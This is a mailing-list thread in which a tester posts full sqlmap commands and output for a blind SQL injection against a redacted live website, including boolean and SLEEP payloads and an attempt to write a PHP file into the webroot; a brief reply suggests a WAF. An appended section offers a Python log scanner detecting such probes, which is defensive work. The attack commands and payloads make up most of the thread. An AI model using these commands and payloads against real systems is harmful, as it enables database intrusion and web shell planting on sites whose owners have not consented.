Hi.

Have you considered that it might be behind some WAF?

Bye
On Jan 22, 2014 6:28 AM, "Alok Kumar" <mypentest...@gmail.com> wrote:

> Hello members, need your help to solve this mystery.
> My manual assessment against a web application revealed the possibility of
> a SQL injection vulnerability, which has been reconfirmed using the Netsparker
> automated web application assessment tool.
>
> I then used sqlmap to exploit the SQL injection flaw to do something
> interesting, but none of them worked for me; even sqlmap says the parameter
> is injectable, and in fact it actually exploited the issue, but unfortunately
> with ZERO results.
>
> I tried almost everything from "--current-db, --dbs, --banner", and
> everything was found to execute with a result value of NONE.
>
> I even tried --sql-shell, which gave me an sql-shell> prompt, but whatever
> query I tried gave ZERO results without any error. I did try some
> custom queries, but that didn't work because of the stacked query limitation.
>
> I'm positively sure that target parameter is injectable but couldn't make
> out why it is not executing and/or giving any response to my query
>
> Please help me in this, Thanks in advance!
>
> I have also posted two of the queries that I executed for your reference.
>
>
> SQLMap query output
> ************************** First query **************************
>
> root@bt:/pentest/database/sqlmap# ./sqlmap.py -u
> http://www.xxxxxx.com/xxx10.php?cid=1111111 --current-db --no-cast
> --time-sec=10 -t xxix-output
>
>     sqlmap/1.0-dev-7ba9e75 - automatic SQL injection and database takeover
> tool
>     http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
> mutual consent is illegal. It is the end user's responsibility to obey all
> applicable local, state and federal laws. Developers assume no liability
> and are not responsible for any misuse or damage caused by this program
>
> [*] starting at 18:54:00
>
> [18:54:00] [INFO] setting file for logging HTTP traffic
> [18:54:00] [INFO] resuming back-end DBMS 'mysql'
> [18:54:00] [INFO] testing connection to the target URL
> [18:54:00] [INFO] heuristics detected web page charset 'ISO-8859-2'
> sqlmap identified the following injection points with a total of 0 HTTP(s)
> requests:
> ---
> Place: GET
> Parameter: cid
>     Type: boolean-based blind
>     Title: AND boolean-based blind - WHERE or HAVING clause
>     Payload: cid=1111111 AND 1062=1062
>
>     Type: AND/OR time-based blind
>     Title: MySQL > 5.0.11 AND time-based blind
>     Payload: cid=1111111 AND SLEEP(10)
> ---
> [18:54:00] [INFO] the back-end DBMS is MySQL
> web server operating system: Linux Ubuntu
> web application technology: Nginx, PHP 5.3.10
> back-end DBMS: MySQL 5.0.11
> [18:54:00] [INFO] fetching current database
> [18:54:00] [WARNING] running in a single-thread mode. Please consider
> usage of option '--threads' for faster data retrieval
> [18:54:00] [INFO] retrieved:
> [18:54:01] [INFO] heuristics detected web page charset 'ascii'
>
> [18:54:01] [WARNING] time-based comparison needs larger statistical model.
> Making a few dummy requests, please wait..
> [18:54:07] [WARNING] it is very important not to stress the network
> adapter's bandwidth during usage of time-based payloads
>
> [18:54:08] [WARNING] in case of continuous data retrieval problems you are
> advised to try a switch '--no-cast' or switch '--hex'
> current database: None
> [18:54:08] [INFO] fetched data logged to text files under
> '/pentest/database/sqlmap/output/www.xxxxxx.com'
>
> [*] shutting down at 18:54:08
>
>
> ************************** Second query **************************
> root@bt:/pentest/database/sqlmap# ./sqlmap.py -u
> http://www.xxxxxx.com/xxx10.php?cid=1111111 --time-sec=10 --sql-shell
>     sqlmap/1.0-dev-7ba9e75 - automatic SQL injection and database takeover
> tool
>     http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
> mutual consent is illegal. It is the end user's responsibility to obey all
> applicable local, state and federal laws. Developers assume no liability
> and are not responsible for any misuse or damage caused by this program
>
> [*] starting at 18:18:17
>
> [18:18:17] [INFO] resuming back-end DBMS 'mysql'
> [18:18:17] [INFO] testing connection to the target URL
> [18:18:18] [INFO] heuristics detected web page charset 'ISO-8859-2'
> sqlmap identified the following injection points with a total of 0 HTTP(s)
> requests:
> ---
> Place: GET
> Parameter: cid
>     Type: boolean-based blind
>     Title: AND boolean-based blind - WHERE or HAVING clause
>     Payload: cid=1111111 AND 1062=1062
>
>     Type: AND/OR time-based blind
>     Title: MySQL > 5.0.11 AND time-based blind
>     Payload: cid=1111111 AND SLEEP(10)
> ---
> [18:18:18] [INFO] the back-end DBMS is MySQL
> web server operating system: Linux Ubuntu
> web application technology: Nginx, PHP 5.3.10
> back-end DBMS: MySQL 5.0.11
> [18:18:18] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press
> ENTER
> sql-shell> user()
> [18:18:25] [INFO] fetching SQL query output: 'user()'
> [18:18:25] [WARNING] running in a single-thread mode. Please consider
> usage of option '--threads' for faster data retrieval
> [18:18:25] [INFO] retrieved:
> [18:18:25] [INFO] heuristics detected web page charset 'ascii'
>
> [18:18:26] [WARNING] time-based comparison needs larger statistical model.
> Making a few dummy requests, please wait..
> [18:18:32] [WARNING] it is very important not to stress the network
> adapter's bandwidth during usage of time-based payloads
>
> [18:18:33] [WARNING] in case of continuous data retrieval problems you are
> advised to try a switch '--no-cast' or switch '--hex'
> sql-shell> user() --hex
> [18:18:59] [INFO] fetching SQL query output: 'user() --hex'
> [18:18:59] [INFO] retrieved:
> [18:19:00] [INFO] retrieved:
> sql-shell> select
> into "/var/www/xxxxxx.com/upload.php"; --hex
> [18:19:16] [WARNING] execution of custom SQL queries is only available
> when stacked queries are supported
> sql-shell> db_name --hex
> [18:19:29] [INFO] fetching SQL query output: 'db_name --hex'
> [18:19:29] [INFO] retrieved:
> [18:19:29] [INFO] retrieved:
> sql-shell> x
> [18:19:39] [INFO] fetched data logged to text files under
> '/pentest/database/sqlmap/output/www.xxxxxx.com'
>
> [*] shutting down at 18:19:39
>
>
>
> ------------------------------------------------------------------------------
> CenturyLink Cloud: The Leader in Enterprise Cloud Services.
> Learn Why More Businesses Are Choosing CenturyLink Cloud For
> Critical Workloads, Development Environments & Everything In Between.
> Get a Quote or Start a Free Trial Today.
>
> http://pubads.g.doubleclick.net/gampad/clk?id=119420431&iu=/4140/ostg.clktrk
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
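A defender-side example added here, not code from the thread or from the sqlmap project: the two payloads sqlmap reported above (`AND 1062=1062` and `AND SLEEP(10)`) leave a recognisable trace in the Nginx access log, and a time-based probe that really made the database sleep also shows up as an unusually long request. The script assumes an Nginx log_format equal to `combined` with `$request_time` appended as a final field, a constructed sample log, and a 5-second delay threshold (sqlmap above used `--time-sec=10`).

```python
"""Flag blind SQL injection probes of the kind sqlmap logged above in Nginx access logs."""
import re
from urllib.parse import urlsplit, parse_qsl

# combined format plus an optional trailing $request_time (assumed custom log_format)
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"(?: (?P<rt>[\d.]+))?$'
)
# Boolean tautology (AND 1062=1062) and time-based (SLEEP/BENCHMARK) payload families
BOOL_RE = re.compile(r"\b(?:AND|OR)\s+(\d+)\s*=\s*\1\b", re.I)
TIME_RE = re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I)
SLOW_SECONDS = 5.0  # assumed threshold; a real sleep shows up as $request_time >= this

# Constructed sample lines modelled on the requests sqlmap made in the thread
SAMPLE_LOG = [
    '203.0.113.7 - - [22/Jan/2014:18:54:00 +0530] "GET /xxx10.php?cid=1111111 HTTP/1.1" '
    '200 5120 "-" "Mozilla/5.0" 0.012',
    '203.0.113.7 - - [22/Jan/2014:18:54:00 +0530] "GET /xxx10.php?cid=1111111%20AND%201062%3D1062 HTTP/1.1" '
    '200 5120 "-" "sqlmap/1.0-dev-7ba9e75 (http://sqlmap.org)" 0.015',
    '203.0.113.7 - - [22/Jan/2014:18:54:01 +0530] "GET /xxx10.php?cid=1111111%20AND%20SLEEP(10) HTTP/1.1" '
    '200 5120 "-" "sqlmap/1.0-dev-7ba9e75 (http://sqlmap.org)" 10.021',
]


def classify(line):
    """Return the findings for one log line; an empty list means it looks benign."""
    m = LOG_RE.match(line)
    if not m:
        return []
    # parse_qsl URL-decodes the values, so 'AND%20SLEEP(10)' becomes 'AND SLEEP(10)'
    query = parse_qsl(urlsplit(m["path"]).query, keep_blank_values=True)
    decoded = " ".join(f"{k}={v}" for k, v in query)
    findings = []
    if BOOL_RE.search(decoded):
        findings.append("boolean-blind-probe")
    if TIME_RE.search(decoded):
        kind = "time-blind-probe"
        if m["rt"] and float(m["rt"]) >= SLOW_SECONDS:
            kind += ":delay-observed"  # the DB actually slept, so the injection is live
        findings.append(kind)
    if "sqlmap" in m["ua"].lower():  # default sqlmap User-Agent; --random-agent hides it
        findings.append("sqlmap-user-agent")
    return findings


def scan(lines):
    """Map each offending source IP to the distinct findings seen from it."""
    report = {}
    for line in lines:
        hits = classify(line)
        if hits:
            ip = LOG_RE.match(line)["ip"]
            report.setdefault(ip, set()).update(hits)
    return report
```

A `delay-observed` hit is the strongest signal here: a tautology may be a false positive, but a 10-second response to a `SLEEP(10)` payload means the database executed attacker-controlled SQL.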